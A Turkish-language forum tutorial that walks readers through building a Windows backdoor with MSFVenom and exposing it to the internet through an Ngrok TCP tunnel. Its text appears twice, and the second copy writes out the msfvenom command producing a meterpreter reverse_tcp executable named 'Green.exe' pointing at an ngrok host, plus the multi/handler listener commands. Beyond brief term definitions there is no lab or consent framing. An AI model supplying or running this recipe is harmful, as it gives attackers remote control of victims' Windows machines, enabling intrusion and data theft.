- 16 May 2020
- 1,640
- 1,172
Hepinize merhaba arkadaşlar bu konumda sizlere MSFVenom ve Met@sploit ile dış ağlara backdoor açılımını göstereceğim.
Bu konuda şunları öğreneceksiniz:
M E T A S P L O I T nedir?
Ngrok nedir?
Ngrok nasıl çalışır?
M S F V E N O M nedir?
Exploit nedir?
Payload nedir?
Port nedir?
Resimli anlatım.
Met@sploit nedir?
Met@sploit, sistemdeki zâfiyetler hakkında bilgi veren, pentest ve IDS'nin gelişimine yardımcı olan bir konsol uygulamasıdır.
Ngrok nedir?
Ngrok, local ağı port yardımıyla internete açan bir uygulamadır.
Ngrok, nasıl çalışır?
Ngrok, belirttiğiniz protokol ve port ile local ağı internete açık hale getirir.
MSFVenom, nedir?
MSFVenom, MSF'e bağlı olan bir payload oluşturmak için kullanılan terminal uygulamasıdır.
Exploit nedir?
Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.
Yazıldığı dillere örnek vermek gerekirse: C, C++, Ruby gibi diller kullanılarak yazılır.
Payload nedir?
Payload, exploit işlemi başarılı olduğu süreçte hedefe gönderilip çalıştırma emri verilen modüldür.
Port, nedir?
Port, bir bağlantının iletişim uç noktasıdır.
Resimli anlatım.
Ngrok hesabı oluşturalım:
Ngrok'un kendi sitesi olan "ngrok.com" sitesine girelim ve sign up tuşuna basalım.
Sonrasında istenilen bilgileri doldurarak kayıt olalım.
Bize lazım olan kısım "2." kısımdır. Bunu bir köşeye yazalım.
Ngrok'u indirelim.
Ngrok indikten sonra terminale "2." kısımdaki kodu yazalım.
Sonrasında ./ngrok tcp 22 komutuyla tcp protokolü kullanarak 22. portu dinlemeye alalım ve yönlendirme işlemini local hostumuza yapsın.
MSFVenom ile backdoor oluşturalım.
Backdoorumuz oluştuktan sonra onu dinlemeye almak için terminale "msfconsole" yazalım.
MSFConsole açıldıktan sonra terminale şunları yazalım:
Terminale "run" yazdığımızda backdoor'u dinlemeye alacağız.
Konuda ki terimler:
Backdoor: Arka kapı
Local: Yerel
Host: Ağ
Local Host: Yerel Ağ
M E T A S P L O I T nedir?
Ngrok nedir?
Ngrok nasıl çalışır?
M S F V E N O M nedir?
Exploit nedir?
Payload nedir?
Port nedir?
Resimli anlatım.
Met@sploit nedir?
Met@sploit, sistemdeki zâfiyetler hakkında bilgi veren, pentest ve IDS'nin gelişimine yardımcı olan bir konsol uygulamasıdır.
Ngrok nedir?
Ngrok, local ağı port yardımıyla internete açan bir uygulamadır.
Ngrok, nasıl çalışır?
Ngrok, belirttiğiniz protokol ve port ile local ağı internete açık hale getirir.
MSFVenom, nedir?
MSFVenom, MSF'e bağlı olan bir payload oluşturmak için kullanılan terminal uygulamasıdır.
Exploit nedir?
Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.
Yazıldığı dillere örnek vermek gerekirse: C, C++, Ruby gibi diller kullanılarak yazılır.
Payload nedir?
Payload, exploit işlemi başarılı olduğu süreçte hedefe gönderilip çalıştırma emri verilen modüldür.
Port, nedir?
Port, bir bağlantının iletişim uç noktasıdır.
Resimli anlatım.
Ngrok hesabı oluşturalım:
Ngrok'un kendi sitesi olan "ngrok.com" sitesine girelim ve sign up tuşuna basalım.
Sonrasında istenilen bilgileri doldurarak kayıt olalım.
Bize lazım olan kısım "2." kısımdır. Bunu bir köşeye yazalım.
Ngrok'u indirelim.
Ngrok indikten sonra terminale "2." kısımdaki kodu yazalım.
Sonrasında ./ngrok tcp 22 komutuyla tcp protokolü kullanarak 22. portu dinlemeye alalım ve yönlendirme işlemini local hostumuza yapsın.
MSFVenom ile backdoor oluşturalım.
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18504 -f exe R > Green.exe
Backdoorumuz oluştuktan sonra onu dinlemeye almak için terminale "msfconsole" yazalım.
MSFConsole açıldıktan sonra terminale şunları yazalım:
Kod:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 22
Terminale "run" yazdığımızda backdoor'u dinlemeye alacağız.
Konuda ki terimler:
Backdoor: Arka kapı
Local: Yerel
Host: Ağ
Local Host: Yerel Ağ
Son düzenleme: